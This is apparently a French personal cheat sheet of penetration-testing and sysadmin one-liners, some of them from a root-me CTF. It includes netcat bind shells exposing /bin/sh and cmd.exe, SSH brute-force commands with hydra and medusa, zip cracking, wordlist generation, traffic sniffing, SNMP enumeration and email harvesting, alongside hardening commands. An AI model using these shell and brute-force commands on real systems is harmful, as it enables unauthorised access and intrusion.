Liste de petites astuces

curl ifconfig.me/ip
nc -vz $IP $PORT
fcrackzip -u -l 1-6 -c 'a1' 12475.zip
dd if=/dev/disk bs=65536 conv=noerror,sync | ssh -C user@serer "cat >/tmp/disque.dd"
crunch 4 8 [0-9a-z] -o mdp.txt

netcat (nc) est la version non chiffré de cryptcat (cryptcat) 

# serveur :
nc -l -p 1000 > fichier.txt
# client :
nc ip_serveur 1000 < fichier.txt
medusa -h 192.168.0.25 -U users.txt -P pass.txt -M ssh -n 122 -f
hydra -L users.txt -P pass.txt -s 122 -t 3 ssh://192.168.0.25
ip -s -s neigh flush all
# serveur :
nc -l -p 1000 -e /bin/sh
nc.exe -L -p 1000 c:\Windows\System32\cmd.exe
# client :
nc ip_serveur 1000
dig @challenge01.root-me.org ch11.challenge01.root-me.org -p 54011 axfr
nc -zv 127.0.0.1 1-2048

tai 

netdiscover -i eth0 -r 192.168.1.0/24
tcpflow -i eth0 -C -J port 80 -w capture.pcap
 urlsnarf -i usb0 (+regex)
btatu@xmg:~$ nslookup 
> server ns5.evolix.net
Default server: ns5.evolix.net
Address: 212.83.165.242#53
> set class=chaos
> set q=txt
> version.bind
Server:		ns5.evolix.net
Address:	212.83.165.242#53

** server can't find version.bind: REFUSED
http://dev.glicer.com/section/probleme-solution/creer-navigateur-personnalise.html
apt-get install snmp
snmpwalk -v1 -c public 192.168.1.254 1 > mibs 
cat mibs  |grep 192.168.1. |grep Hex|grep iso.3.6.1.2.1.3.1 |less

Trouver les mails d'un domaine

Télécharger le logiciel sur www.edge-security.com puis 

theharvester -d syngress.com -l 10 -b google

Historique des connexions

lastlog ­-t 10

Le base64

 echo "bonjour" | openssl base64
 echo "bonjour" | base64
 Ym9uam91cgo=
echo "Ym9uam91cgo=" | openssl base64 -d
echo "Ym9uam91cgo=" | base64 -d
bonjour
sysctl -w net.ipv4.conf.default.rp_filter = 1
sysctl -w net.ipv4.tcp_syncookies = 1
sysctl -w net.ipv4.conf.all.accept_redirects = 0
sysctl -w net.ipv4.conf.all.secure_redirects = 0
apt-get install lynis && lynis -c -q

Pour ssh : https://github.com/arthepsy/ssh-audit

commandes en vracs

radiff2
rax2
rasm2
rabin2
radind2